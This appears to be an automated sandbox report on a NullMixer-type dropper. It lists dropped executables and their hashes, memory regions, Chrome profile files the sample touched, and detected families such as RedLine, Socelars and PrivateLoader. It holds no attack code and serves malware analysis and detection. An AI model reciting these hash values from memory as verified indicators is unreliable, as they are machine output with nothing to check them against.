SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/3140-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3140-66-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1444-67-0x000000007313E000-0x000000007313F000-memory.dmp

memory/3140-65-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1444-68-0x0000000004940000-0x0000000004976000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14f1396dfcf191bd.exe

MD5 15c6dc87edd001c0bf0df6f9405ad7db
SHA1 9582017cd83642ffdac143daeed13e840f4b2350
SHA256 5e7a5af6e0cea11934feaa716867e906644eb20df743b1c5fa85558de0c1b10d
SHA512 6fffd09475af31c9cdc56f561c13921975c236c6590ede369e5d863469452a6224d2ee9550d9f73fb65696c9d46185e487bf0764922c95831882a8029151603f

memory/1444-83-0x0000000005070000-0x0000000005698000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe

MD5 148c3657379750b2fe7237ac1b06f507
SHA1 c464da9412a32ab71cd62491405296672c7ba3ad
SHA256 41a780cbf232d3ed4912406bdbb084f61c9faf56dcc0a7a81381546689170c64
SHA512 360588010bda2d3d514508fe9f2f95f63ca7a78476e24043985c350814c54f25c1f60c45e68e4431c2301f90b4092f88866624b12eb637145403592e7218d6bc

memory/3552-86-0x0000000000410000-0x0000000000418000-memory.dmp

memory/5088-92-0x0000000004AD0000-0x0000000004B46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe

MD5 77666d51bc3fc167013811198dc282f6
SHA1 18e03eb6b95fd2e5b51186886f661dcedc791759
SHA256 6a3d44d750ba258b1854431d89db135abc5d543ada1b384c5306e98031b8f1c9
SHA512 a024f008567a7417fe975063f661a0b278fb70c7576a7453e482f2e3f5c6cc48b5faaa55ec197e3082626faaa3598c9ff7bcca798ba7a1408bf666e61fdf4cd0

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qsxlbqwh.max.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1487ca754e680f91.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/3968-117-0x0000000000F00000-0x0000000000F18000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe

MD5 9b07fc470646ce890bcb860a5fb55f13
SHA1 ef01d45abaf5060a0b32319e0509968f6be3082f
SHA256 506c6ee68b29701403739da25679b640d21b1b121f45dde5bc25705901a6ed0b
SHA512 4cc1b725c6fb539d832d2d5315bbc63e967a41129d25c2102b2df19e4931e4e06c2a9f70a3336d98b9e031c636d021e713f10dbbd86a57f447a7581221a470cc

memory/1808-128-0x0000000000400000-0x0000000000414000-memory.dmp

memory/5088-132-0x0000000005360000-0x0000000005904000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-E6E5C.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/3968-131-0x00000000016B0000-0x00000000016B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat144474a564d26f29.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

memory/4964-145-0x0000000005C50000-0x0000000005C6E000-memory.dmp

memory/4964-146-0x00000000061E0000-0x000000000622C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14514904a4b.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

memory/4964-106-0x0000000005690000-0x00000000059E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe

MD5 a1d90c2ea649aae4d9492b584c52ef5c
SHA1 32969454090b6dd84a9b97d19bd58845cda5aae6
SHA256 64f7fc506342b8fd9bf09d45a012f9c996237e06cffbade5d3aedb1c8d967023
SHA512 09bf2aa523933dc05fb23a6d97f56ba33ba5894667b62f2275a4e94b86e9ac82d6faeda7dfdc0ac1c966fe13b0be29ae98158850d815021bd88837a3453b6e73

memory/4964-96-0x0000000005620000-0x0000000005686000-memory.dmp

memory/5088-94-0x0000000004C50000-0x0000000004C6E000-memory.dmp

memory/4964-93-0x0000000004C90000-0x0000000004CB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe

MD5 4d255e96e5056f2c899884babcc55691
SHA1 44caeb1df6288c94081b805ee17f66db34dc7834
SHA256 e7678a0537796c6199bbc7fc5c143b475280564558250df218d62012c3b98506
SHA512 ad2cebd784a525d3fe2e3523c4f3d2ab793da84811a41b08aae99141d9c53f545b180d36f05647ddef04bba200b6a0fc917e481913f3b2b0162c136ec8355c44

memory/4964-95-0x00000000055B0000-0x0000000005616000-memory.dmp

memory/5088-91-0x00000000003C0000-0x0000000000428000-memory.dmp

memory/1444-90-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/4964-89-0x0000000073130000-0x00000000738E0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

MD5 8e0abf31bbb7005be2893af10fcceaa9
SHA1 a48259c2346d7aed8cf14566d066695a8c2db55c
SHA256 2df6cc430475ae053ad2772a3a9d1de1a03af31c3ebfdd0e5d5bd7fbdc61866a
SHA512 ba76470f4896e6bdac508e6a901b352a3bf731ab5680b9931cc1a8c874482cf0c19a374a6a58dda5237178c1861509529a5174bf76fa768efac7989dbc1c1970

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/4964-84-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/1444-70-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/4964-69-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/3140-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3140-63-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3140-62-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3140-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3140-59-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3140-58-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3140-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3140-55-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3140-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3140-53-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3140-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS08061237\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/1808-155-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4540-152-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1620-168-0x0000000000400000-0x000000000041E000-memory.dmp

memory/3140-175-0x000000006EB40000-0x000000006EB63000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-SJ2PD.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3044-151-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/3140-180-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3140-179-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3140-178-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1252-184-0x0000000000400000-0x0000000000883000-memory.dmp

memory/3140-177-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3140-171-0x0000000000400000-0x000000000051C000-memory.dmp

memory/1444-188-0x0000000006E40000-0x0000000006E72000-memory.dmp

memory/4964-200-0x000000006E1A0000-0x000000006E1EC000-memory.dmp

memory/1444-189-0x000000006E1A0000-0x000000006E1EC000-memory.dmp

memory/1444-199-0x0000000006E20000-0x0000000006E3E000-memory.dmp

memory/1444-210-0x0000000007130000-0x00000000071D3000-memory.dmp

memory/4964-211-0x00000000075D0000-0x0000000007C4A000-memory.dmp

memory/4964-212-0x0000000006F70000-0x0000000006F8A000-memory.dmp

memory/1444-213-0x0000000007240000-0x000000000724A000-memory.dmp

memory/4964-216-0x00000000071E0000-0x0000000007276000-memory.dmp

memory/4964-219-0x0000000007170000-0x0000000007181000-memory.dmp

memory/4964-220-0x00000000071A0000-0x00000000071AE000-memory.dmp

memory/4964-221-0x00000000071B0000-0x00000000071C4000-memory.dmp

memory/4964-222-0x00000000072A0000-0x00000000072BA000-memory.dmp

memory/4964-223-0x0000000007290000-0x0000000007298000-memory.dmp

memory/4964-230-0x0000000073130000-0x00000000738E0000-memory.dmp

memory/1444-229-0x0000000073130000-0x00000000738E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

memory/4964-231-0x0000000073130000-0x00000000738E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5be505c5eebf25763c21a7deedb2fcaf
SHA1 bed5a5ec0ffe3158f5c1a11a64a4ae596a1925b6
SHA256 8282deb9f52eff799b2b1dc947b1f2490f498fd7f92ff780603bcdc52e1f67e3
SHA512 a660bafdc776f4271a7b7eb15f548474ae408f28b8b731dc206c5799b50430569a1c8c70b8ca49d3aed66e66e7fcc8bd49cb3fbe997af38e76dc34098753245b

C:\Users\Admin\AppData\Local\Temp\lkyqBUE.m

MD5 ce2da93761dc1ddb916fd1474c2a4e8f
SHA1 5d04fad0fd8df47a2cf322288a9ef5bbe85a783c
SHA256 c5284035228617e55e3ddb94d5900a0a460d292ad121b8ad6f0c10497a700673
SHA512 77f4dfa33e102f0b3d94a167413f3ef30dcd522d4a3c000203521449e385bba4b5691f38408e75b378cc62d9fed98b460e6e1daa0251332aa9105d52d54a5b44

C:\Users\Admin\AppData\Local\Temp\9h1gI_ny.t

MD5 719406c6176706f60d8f511ce6096c2d
SHA1 5044cc1af74e9d762feabdfe1fa46ad558249a65
SHA256 53642a2d499eb8bc9fdc9c27344436dc5989f9f493c4d21648172b7110e906a0
SHA512 9c00fda0639daaae2882f2932ab8e1b29403b9434473bb34f10d229b33f68d973f1a8b73968b7386ad9d4551cad6cb8ec86c1f45fa57637e0cfcae0c7b0b911e

C:\Users\Admin\AppData\Local\Temp\i5glXU.q

MD5 df345237695fb3974d0adb7ba892db7b
SHA1 4f6904679510f87b4e3df83e4c1f3804cb4aa773
SHA256 76a22ff20b5a218c06469f45c87209471b7f5f33fb680ed539efb090c1632bad
SHA512 bf43ae459535b92f739413aeee3cdb8f27ace4e0009024e0381b13632e1dbc23df667eab924959c43b805b1305dabe6caaf88785fb0ab1d45544d9d46ba7d50e

C:\Users\Admin\AppData\Local\Temp\U9bIuq0J.~dW

MD5 dcb29594703e229efa20bedff41fe3e6
SHA1 7473bf4265ce63a48d46f76af3a709eeb89e5363
SHA256 f0f3e4ac0575c8cca414c05075dc4ec3f9fa987a63942d5ec222758eadca2331
SHA512 bd8e007cc26bf03d202c6cd6a5655d3aebef4ac61e39306fa139f52e1bb051a29c7d088fac3717c57ec23fea6be7260c1d1917a9c76f6bb2c207b2d10b68f982

C:\Users\Admin\AppData\Local\Temp\vuR_hcMP.3T

MD5 c7d6c3ce016c46c94cfcda0c814f2889
SHA1 a552326f590bbf8d2f9a69a23863cefd83ff9687
SHA256 733e5e284c182b6de7e2d287a4b12722cfba8c393dd82bb11c766cbe5b94bb43
SHA512 6c6e7538a0f5c91be742caaab91cc3e87f8574a2a492831015f16d8e01e3fb9a9f11abc3155b4c573c7305e4057ce6013f2cbf4dd710b4a2773339790ea97a08

C:\Users\Admin\AppData\Local\Temp\PajLCM.4

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\2KSA.GF7

MD5 d5cf57f31382a02cdb438c4f8bd43bb5
SHA1 d97c0980867154244d75bdf22e7bf3414ab8cd69
SHA256 47a99eb1fc2bb12d2c37f0baab7566145815f5f1538429925c387ee5e80e5b80
SHA512 be664c7e55774b456e905f58ad7cc678514898460dfa17dae596d9eed5136e7da337e6b75ea3d11345eb3378874b1db85de3c93e63df573780a9882af9b43929

memory/1596-266-0x0000000000400000-0x000000000089C000-memory.dmp

memory/4304-269-0x0000000003610000-0x00000000036B5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 fa8e404bacaa82df3b409f5173d01617
SHA1 4b5a11ca60282fe34088866399bdbf41a18e5928
SHA256 77f40de59fa3cf8ba2735d3ba4a7afc5f4aeb60e824e0cc75832482154412459
SHA512 fd4bb3ff48eaa26ab69f5df79a3b7824065bf5f840431d29c194e2caf77b5934176dd505ff018f27034ea594c8038407ff0b5878d2fae6c0f14e3555523572e6

\??\pipe\crashpad_1412_FOJYLJNRLLTKKXVQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4304-281-0x00000000036D0000-0x0000000003762000-memory.dmp

memory/4304-278-0x00000000036D0000-0x0000000003762000-memory.dmp

memory/4540-285-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1948-286-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/4304-292-0x0000000000400000-0x00000000005A8000-memory.dmp

memory/1596-294-0x0000000000400000-0x000000000089C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 ca40aadbfd7fb6a92a8ada0364f8439a
SHA1 e4b5a04eb1bbac5acc618991bd730b68845e7cac
SHA256 01e28775239fa1cfb9fcbd22b0ef1d23eb2e57fbee7ec18499565d90e3ee4fdd
SHA512 a2a161a6ecae18dc9c5621b8dd55ad748a77a6699db3fd6004a88f5df2dedb88ea0099135e5a2af9d83e4472026d2839f1fbf94bcdcf1a3fa4a62845fb7a3b7d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 56f76c08c802b963ce1bff9c551d2000
SHA1 2d08a2a14ed0fc59655b54f0384a4e811cedeaa3
SHA256 81b09fd52583237dff7d7d2b3c49d29940d950149b38a31b903f0537b59cc0ac
SHA512 a5d485460448494cc1a0caadd4d383c19bf33e4e1d91e3a93915c4c493ec875da3b96eb13d6557436104affe1b91714f33de519f4111f920e90fed8db5373f2f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 fe93989980d2e27bf58e3cbc88b20551
SHA1 fd8c1c2e779c3003c7f52477c0a3838eb26e5a13
SHA256 1fc40c9270fafca8b8f72b5ccedc6350e0e4b429dfae02e25a1367bb02e52dcf
SHA512 fa3e96ccdd5a47a21e2d49540d7fa86774dd12c318bde02e19949626e530b26949096e31bef412464ed337b2eb5687fd7ef97678453e9263693f039adba7c8c6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 534cb6e078a2987889da837f17afe043
SHA1 77dff5c6177d588cad64b56cb5703a1ebfb48f80
SHA256 158157c1a5ba9c28c3e13ddb254b11f57b6e03e6310d2a5510bc0a09203e6e31
SHA512 db83aaf0081581dee983a3cfbb8ca9d25a5494ac0e0c7918bf00e3acfaf6dd5f9f5bf75eb7cbe326d18a4ff5ab8e0ef9e95dc5f15083f98fc658defddc1bb9bc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 4778d605e70deac81c2bcd3db9306667
SHA1 ce95db782b09556fc94ebe195d7b5118a204d692
SHA256 7e4332a52f83060fab3c6538c6f651933e53732010664fee40b86f004fb3c9f6
SHA512 1704792b7b5dd9fdcca9649349e1d5b30c8a2bb7a908a2d25dab801648d83dfe9e7d067e3c9b0975aaaca12ac5f246991662580dd6223654761ad85e2dbd49a5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a4db6594e57b347a377a46cb38f9315d
SHA1 433eceb1eab124918e1bcce5f1819185bc8ba150
SHA256 0fcf7596433f716c31f4d015f85635f87d11f12e8afa54f8857f3981f1febfc5
SHA512 d1093161454cda73ef4d17c6f4123a6ca0df39a71e20aaec4921c7361fa13ff9a14876916fb67154c2192be0b2ac788897246f50b9e5025b09bff93e099dac7e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e48492ae249fc12cf8cedb96ca0cc344
SHA1 b442720d0c23ce82d6489aba4b8ea3201870a546
SHA256 3f5df6423c0545c67e3d96736b588adf1295523adcfdabbc53e9a49fd2703d35
SHA512 290198c6acf9875bfd8d799588707b2c278650a0252b5eb2a5ac898414ac2d4d7e9f68adc619a605f85dcbaac858696ffcaf4e3fc6fc1fce9722737306a4fe19

memory/4304-358-0x00000000036D0000-0x0000000003762000-memory.dmp

memory/4304-360-0x0000000005520000-0x00000000055AC000-memory.dmp

memory/4304-359-0x0000000003770000-0x000000000551F000-memory.dmp

memory/4304-361-0x00000000055B0000-0x0000000005639000-memory.dmp

memory/4304-362-0x00000000055B0000-0x0000000005639000-memory.dmp

memory/4304-364-0x00000000055B0000-0x0000000005639000-memory.dmp

memory/4304-366-0x0000000001200000-0x0000000001201000-memory.dmp

memory/4304-367-0x0000000001210000-0x0000000001214000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 060c6309f9c00d25e4c24343d692a8b0
SHA1 3fd9eb2206ded8110a90e77af375305290f333be
SHA256 ac3d05f62a6c3b3bbc168eab130bcebd3f15c44788a427ea0f70afbdcc261a82
SHA512 76801803df1e5520e55904d3c5fe3ff148093d3cd3813a629d0dcee3e46d0b9b94f8a667c3229333353f3d27c3ad0b3934d1db702b57071d80fdbc652b6870cd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 48717244f959209d7df3309c6f38c890
SHA1 74a31e3d2aacaeefcae92e12c0c7b465a0a20412
SHA256 9e1b482d8400a1be492e861bb68fc4501cb1007e29fd8d20de6dacdf507999ad
SHA512 05e632fbe2f63b9938b025e9f2f637f6586b936532ce85fff136a086449a35fc02be60fb1d38fcccee59f9f872ece4b6a6a6feb5c5ad778423f1dbe98e70bda4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\a4715169-3d63-4270-9604-15c71d1fd595.tmp

MD5 8eebf0efd195f49ceec0d20a0c3952cf
SHA1 dc2f76499725d8ebc4146ee2cc7dc49223ad7a5d
SHA256 99a9b28b9d57f9e908455938d9e46e0e82c75252b626b8ab44b52bf9c2e2f422
SHA512 5eec362ece13d5de6fb97a40531a369dd34608b685ddce38e39cb0a4255e3e5343f661feb9a49cbd37083501712e878b627de2b7db4550e89625e4bf6b7280f1

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win7-20241010-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-75P4F.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-AOB5K.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\Sat1427fbafcf251.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81A6C6D7\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
